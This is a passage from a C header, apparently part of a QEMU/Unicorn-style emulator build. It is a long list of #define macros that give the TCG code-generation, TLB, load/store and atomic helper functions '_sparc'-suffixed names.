tcg_tb_phys_invalidate_count_sparc #define tcg_malloc_internal tcg_malloc_internal_sparc #define tcg_pool_reset tcg_pool_reset_sparc #define tcg_context_init tcg_context_init_sparc #define tcg_tb_alloc tcg_tb_alloc_sparc #define tcg_prologue_init tcg_prologue_init_sparc #define tcg_func_start tcg_func_start_sparc #define tcg_set_frame tcg_set_frame_sparc #define tcg_global_mem_new_internal tcg_global_mem_new_internal_sparc #define tcg_temp_new_internal tcg_temp_new_internal_sparc #define tcg_temp_new_vec tcg_temp_new_vec_sparc #define tcg_temp_new_vec_matching tcg_temp_new_vec_matching_sparc #define tcg_temp_free_internal tcg_temp_free_internal_sparc #define tcg_const_i32 tcg_const_i32_sparc #define tcg_const_i64 tcg_const_i64_sparc #define tcg_const_local_i32 tcg_const_local_i32_sparc #define tcg_const_local_i64 tcg_const_local_i64_sparc #define tcg_op_supported tcg_op_supported_sparc #define tcg_gen_callN tcg_gen_callN_sparc #define tcg_op_remove tcg_op_remove_sparc #define tcg_emit_op tcg_emit_op_sparc #define tcg_op_insert_before tcg_op_insert_before_sparc #define tcg_op_insert_after tcg_op_insert_after_sparc #define tcg_cpu_exec_time tcg_cpu_exec_time_sparc #define tcg_gen_code tcg_gen_code_sparc #define tcg_gen_op1 tcg_gen_op1_sparc #define tcg_gen_op2 tcg_gen_op2_sparc #define tcg_gen_op3 tcg_gen_op3_sparc #define tcg_gen_op4 tcg_gen_op4_sparc #define tcg_gen_op5 tcg_gen_op5_sparc #define tcg_gen_op6 tcg_gen_op6_sparc #define tcg_gen_mb tcg_gen_mb_sparc #define tcg_gen_addi_i32 tcg_gen_addi_i32_sparc #define tcg_gen_subfi_i32 tcg_gen_subfi_i32_sparc #define tcg_gen_subi_i32 tcg_gen_subi_i32_sparc #define tcg_gen_andi_i32 tcg_gen_andi_i32_sparc #define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc #define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc #define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc #define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc #define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc #define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_sparc #define tcg_gen_muli_i32 tcg_gen_muli_i32_sparc #define tcg_gen_div_i32 tcg_gen_div_i32_sparc #define tcg_gen_rem_i32 tcg_gen_rem_i32_sparc #define tcg_gen_divu_i32 tcg_gen_divu_i32_sparc #define tcg_gen_remu_i32 tcg_gen_remu_i32_sparc #define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_sparc #define tcg_gen_nand_i32 tcg_gen_nand_i32_sparc #define tcg_gen_nor_i32 tcg_gen_nor_i32_sparc #define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc #define tcg_gen_clz_i32 tcg_gen_clz_i32_sparc #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_sparc #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_sparc #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_sparc #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_sparc #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_sparc #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_sparc #define tcg_gen_extract_i32 tcg_gen_extract_i32_sparc #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_sparc #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_sparc #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc #define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_sparc #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_sparc #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc #define tcg_gen_smin_i32 tcg_gen_smin_i32_sparc #define tcg_gen_umin_i32 tcg_gen_umin_i32_sparc #define tcg_gen_smax_i32 tcg_gen_smax_i32_sparc #define tcg_gen_umax_i32 tcg_gen_umax_i32_sparc #define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc #define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_sparc #define tcg_gen_subi_i64 tcg_gen_subi_i64_sparc #define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc #define tcg_gen_ori_i64 tcg_gen_ori_i64_sparc #define tcg_gen_xori_i64 tcg_gen_xori_i64_sparc #define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc #define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc #define tcg_gen_sari_i64 tcg_gen_sari_i64_sparc #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_sparc #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_sparc #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_sparc #define tcg_gen_muli_i64 tcg_gen_muli_i64_sparc #define tcg_gen_div_i64 tcg_gen_div_i64_sparc #define tcg_gen_rem_i64 tcg_gen_rem_i64_sparc #define tcg_gen_divu_i64 tcg_gen_divu_i64_sparc #define tcg_gen_remu_i64 tcg_gen_remu_i64_sparc #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_sparc #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_sparc #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_sparc #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_sparc #define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_sparc #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_sparc #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_sparc #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_sparc #define tcg_gen_not_i64 tcg_gen_not_i64_sparc #define tcg_gen_andc_i64 tcg_gen_andc_i64_sparc #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_sparc #define tcg_gen_nand_i64 tcg_gen_nand_i64_sparc #define tcg_gen_nor_i64 tcg_gen_nor_i64_sparc #define tcg_gen_orc_i64 tcg_gen_orc_i64_sparc #define tcg_gen_clz_i64 tcg_gen_clz_i64_sparc #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_sparc #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_sparc #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_sparc #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_sparc #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_sparc #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_sparc #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_sparc #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_sparc #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_sparc #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_sparc #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_sparc #define tcg_gen_extract_i64 tcg_gen_extract_i64_sparc #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_sparc #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_sparc #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc #define tcg_gen_add2_i64 tcg_gen_add2_i64_sparc #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_sparc #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_sparc #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_sparc #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_sparc #define tcg_gen_smin_i64 tcg_gen_smin_i64_sparc #define tcg_gen_umin_i64 tcg_gen_umin_i64_sparc #define tcg_gen_smax_i64 tcg_gen_smax_i64_sparc #define tcg_gen_umax_i64 tcg_gen_umax_i64_sparc #define tcg_gen_abs_i64 tcg_gen_abs_i64_sparc #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_sparc #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_sparc #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_sparc #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_sparc #define tcg_gen_exit_tb tcg_gen_exit_tb_sparc #define tcg_gen_goto_tb tcg_gen_goto_tb_sparc #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_sparc #define check_exit_request check_exit_request_sparc #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_sparc #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_sparc #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_sparc #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_sparc #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_sparc #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_sparc #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_sparc #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_sparc #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_sparc #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_sparc #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_sparc #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_sparc #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_sparc #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_sparc #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_sparc #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_sparc #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_sparc #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_sparc #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_sparc #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_sparc #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_sparc #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_sparc #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_sparc #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_sparc #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_sparc #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_sparc #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_sparc #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_sparc #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_sparc #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_sparc #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_sparc #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_sparc #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_sparc #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_sparc #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_sparc #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_sparc #define simd_desc simd_desc_sparc #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_sparc #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_sparc #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_sparc #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_sparc #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_sparc #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_sparc #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_sparc #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_sparc #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_sparc #define tcg_gen_gvec_2 tcg_gen_gvec_2_sparc #define tcg_gen_gvec_2i tcg_gen_gvec_2i_sparc #define tcg_gen_gvec_2s tcg_gen_gvec_2s_sparc #define tcg_gen_gvec_3 tcg_gen_gvec_3_sparc #define tcg_gen_gvec_3i tcg_gen_gvec_3i_sparc #define tcg_gen_gvec_4 tcg_gen_gvec_4_sparc #define tcg_gen_gvec_mov tcg_gen_gvec_mov_sparc #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_sparc #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_sparc #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_sparc #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_sparc #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_sparc #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_sparc #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_sparc #define tcg_gen_gvec_not tcg_gen_gvec_not_sparc #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_sparc #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_sparc #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_sparc #define tcg_gen_gvec_add tcg_gen_gvec_add_sparc #define tcg_gen_gvec_adds tcg_gen_gvec_adds_sparc #define tcg_gen_gvec_addi tcg_gen_gvec_addi_sparc #define tcg_gen_gvec_subs tcg_gen_gvec_subs_sparc #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_sparc #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_sparc #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_sparc #define tcg_gen_gvec_sub tcg_gen_gvec_sub_sparc #define tcg_gen_gvec_mul tcg_gen_gvec_mul_sparc #define tcg_gen_gvec_muls tcg_gen_gvec_muls_sparc #define tcg_gen_gvec_muli tcg_gen_gvec_muli_sparc #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_sparc #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_sparc #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_sparc #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_sparc #define tcg_gen_gvec_smin tcg_gen_gvec_smin_sparc #define tcg_gen_gvec_umin tcg_gen_gvec_umin_sparc #define tcg_gen_gvec_smax tcg_gen_gvec_smax_sparc #define tcg_gen_gvec_umax tcg_gen_gvec_umax_sparc #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_sparc #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_sparc #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_sparc #define tcg_gen_gvec_neg tcg_gen_gvec_neg_sparc #define tcg_gen_gvec_abs tcg_gen_gvec_abs_sparc #define tcg_gen_gvec_and tcg_gen_gvec_and_sparc #define tcg_gen_gvec_or tcg_gen_gvec_or_sparc #define tcg_gen_gvec_xor tcg_gen_gvec_xor_sparc #define tcg_gen_gvec_andc tcg_gen_gvec_andc_sparc #define tcg_gen_gvec_orc tcg_gen_gvec_orc_sparc #define tcg_gen_gvec_nand tcg_gen_gvec_nand_sparc #define tcg_gen_gvec_nor tcg_gen_gvec_nor_sparc #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_sparc #define tcg_gen_gvec_ands tcg_gen_gvec_ands_sparc #define tcg_gen_gvec_andi tcg_gen_gvec_andi_sparc #define tcg_gen_gvec_xors tcg_gen_gvec_xors_sparc #define tcg_gen_gvec_xori tcg_gen_gvec_xori_sparc #define tcg_gen_gvec_ors tcg_gen_gvec_ors_sparc #define tcg_gen_gvec_ori tcg_gen_gvec_ori_sparc #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_sparc #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_sparc #define tcg_gen_gvec_shli tcg_gen_gvec_shli_sparc #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_sparc #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_sparc #define tcg_gen_gvec_shri tcg_gen_gvec_shri_sparc #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_sparc #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_sparc #define tcg_gen_gvec_sari tcg_gen_gvec_sari_sparc #define tcg_gen_gvec_shls tcg_gen_gvec_shls_sparc #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_sparc #define tcg_gen_gvec_sars tcg_gen_gvec_sars_sparc #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_sparc #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_sparc #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_sparc #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_sparc #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_sparc #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_sparc #define vec_gen_2 vec_gen_2_sparc #define vec_gen_3 vec_gen_3_sparc #define vec_gen_4 vec_gen_4_sparc #define tcg_gen_mov_vec tcg_gen_mov_vec_sparc #define tcg_const_zeros_vec tcg_const_zeros_vec_sparc #define tcg_const_ones_vec tcg_const_ones_vec_sparc #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_sparc #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_sparc #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_sparc #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_sparc #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_sparc #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_sparc #define tcg_gen_dupi_vec tcg_gen_dupi_vec_sparc #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_sparc #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_sparc #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_sparc #define tcg_gen_ld_vec tcg_gen_ld_vec_sparc #define tcg_gen_st_vec tcg_gen_st_vec_sparc #define tcg_gen_stl_vec tcg_gen_stl_vec_sparc #define tcg_gen_and_vec tcg_gen_and_vec_sparc #define tcg_gen_or_vec tcg_gen_or_vec_sparc #define tcg_gen_xor_vec tcg_gen_xor_vec_sparc #define tcg_gen_andc_vec tcg_gen_andc_vec_sparc #define tcg_gen_orc_vec tcg_gen_orc_vec_sparc #define tcg_gen_nand_vec tcg_gen_nand_vec_sparc #define tcg_gen_nor_vec tcg_gen_nor_vec_sparc #define tcg_gen_eqv_vec tcg_gen_eqv_vec_sparc #define tcg_gen_not_vec tcg_gen_not_vec_sparc #define tcg_gen_neg_vec tcg_gen_neg_vec_sparc #define tcg_gen_abs_vec tcg_gen_abs_vec_sparc #define tcg_gen_shli_vec tcg_gen_shli_vec_sparc #define tcg_gen_shri_vec tcg_gen_shri_vec_sparc #define tcg_gen_sari_vec tcg_gen_sari_vec_sparc #define tcg_gen_cmp_vec tcg_gen_cmp_vec_sparc #define tcg_gen_add_vec tcg_gen_add_vec_sparc #define tcg_gen_sub_vec tcg_gen_sub_vec_sparc #define tcg_gen_mul_vec tcg_gen_mul_vec_sparc #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_sparc #define tcg_gen_usadd_vec tcg_gen_usadd_vec_sparc #define tcg_gen_sssub_vec tcg_gen_sssub_vec_sparc #define tcg_gen_ussub_vec tcg_gen_ussub_vec_sparc #define tcg_gen_smin_vec tcg_gen_smin_vec_sparc #define tcg_gen_umin_vec tcg_gen_umin_vec_sparc #define tcg_gen_smax_vec tcg_gen_smax_vec_sparc #define tcg_gen_umax_vec tcg_gen_umax_vec_sparc #define tcg_gen_shlv_vec tcg_gen_shlv_vec_sparc #define tcg_gen_shrv_vec tcg_gen_shrv_vec_sparc #define tcg_gen_sarv_vec tcg_gen_sarv_vec_sparc #define tcg_gen_shls_vec tcg_gen_shls_vec_sparc #define tcg_gen_shrs_vec tcg_gen_shrs_vec_sparc #define tcg_gen_sars_vec tcg_gen_sars_vec_sparc #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_sparc #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_sparc #define tb_htable_lookup tb_htable_lookup_sparc #define tb_set_jmp_target tb_set_jmp_target_sparc #define cpu_exec cpu_exec_sparc #define cpu_loop_exit_noexc cpu_loop_exit_noexc_sparc #define cpu_reloading_memory_map cpu_reloading_memory_map_sparc #define cpu_loop_exit cpu_loop_exit_sparc #define cpu_loop_exit_restore cpu_loop_exit_restore_sparc #define cpu_loop_exit_atomic cpu_loop_exit_atomic_sparc #define tlb_init tlb_init_sparc #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_sparc #define tlb_flush tlb_flush_sparc #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_sparc #define tlb_flush_all_cpus tlb_flush_all_cpus_sparc #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_sparc #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_sparc #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_sparc #define tlb_flush_page tlb_flush_page_sparc #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_sparc #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_sparc #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_sparc #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_sparc #define tlb_protect_code tlb_protect_code_sparc #define tlb_unprotect_code tlb_unprotect_code_sparc #define tlb_reset_dirty tlb_reset_dirty_sparc #define tlb_set_dirty tlb_set_dirty_sparc #define tlb_set_page_with_attrs tlb_set_page_with_attrs_sparc #define tlb_set_page tlb_set_page_sparc #define get_page_addr_code_hostp get_page_addr_code_hostp_sparc #define get_page_addr_code get_page_addr_code_sparc #define probe_access probe_access_sparc #define tlb_vaddr_to_host tlb_vaddr_to_host_sparc #define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc #define helper_le_lduw_mmu helper_le_lduw_mmu_sparc #define helper_be_lduw_mmu helper_be_lduw_mmu_sparc #define helper_le_ldul_mmu helper_le_ldul_mmu_sparc #define helper_be_ldul_mmu helper_be_ldul_mmu_sparc #define helper_le_ldq_mmu helper_le_ldq_mmu_sparc #define helper_be_ldq_mmu helper_be_ldq_mmu_sparc #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc #define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc #define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc #define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc #define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_sparc #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_sparc #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_sparc #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_sparc #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_sparc #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_sparc #define cpu_ldub_data_ra cpu_ldub_data_ra_sparc #define cpu_ldsb_data_ra cpu_ldsb_data_ra_sparc #define cpu_lduw_data_ra cpu_lduw_data_ra_sparc #define cpu_ldsw_data_ra cpu_ldsw_data_ra_sparc #define cpu_ldl_data_ra cpu_ldl_data_ra_sparc #define cpu_ldq_data_ra cpu_ldq_data_ra_sparc #define cpu_ldub_data cpu_ldub_data_sparc #define cpu_ldsb_data cpu_ldsb_data_sparc #define cpu_lduw_data cpu_lduw_data_sparc #define cpu_ldsw_data cpu_ldsw_data_sparc #define cpu_ldl_data cpu_ldl_data_sparc #define cpu_ldq_data cpu_ldq_data_sparc #define helper_ret_stb_mmu helper_ret_stb_mmu_sparc #define helper_le_stw_mmu helper_le_stw_mmu_sparc #define helper_be_stw_mmu helper_be_stw_mmu_sparc #define helper_le_stl_mmu helper_le_stl_mmu_sparc #define helper_be_stl_mmu helper_be_stl_mmu_sparc #define helper_le_stq_mmu helper_le_stq_mmu_sparc #define helper_be_stq_mmu helper_be_stq_mmu_sparc #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_sparc #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_sparc #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_sparc #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_sparc #define cpu_stb_data_ra cpu_stb_data_ra_sparc #define cpu_stw_data_ra cpu_stw_data_ra_sparc #define cpu_stl_data_ra cpu_stl_data_ra_sparc #define cpu_stq_data_ra cpu_stq_data_ra_sparc #define cpu_stb_data cpu_stb_data_sparc #define cpu_stw_data cpu_stw_data_sparc #define cpu_stl_data cpu_stl_data_sparc #define cpu_stq_data cpu_stq_data_sparc #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_sparc #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_sparc #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_sparc #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_sparc #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_sparc #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_sparc #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_sparc #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_sparc #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_sparc #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_sparc #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_sparc #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_sparc #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_sparc #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_sparc #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_sparc #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_sparc #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_sparc #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_sparc #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_sparc #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_sparc #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_sparc #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_sparc #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_sparc #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_sparc #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_sparc #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_sparc #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_sparc #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_sparc #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_sparc #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_sparc #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_sparc #define helper_atomic_fetch_umaxw_le_mmu 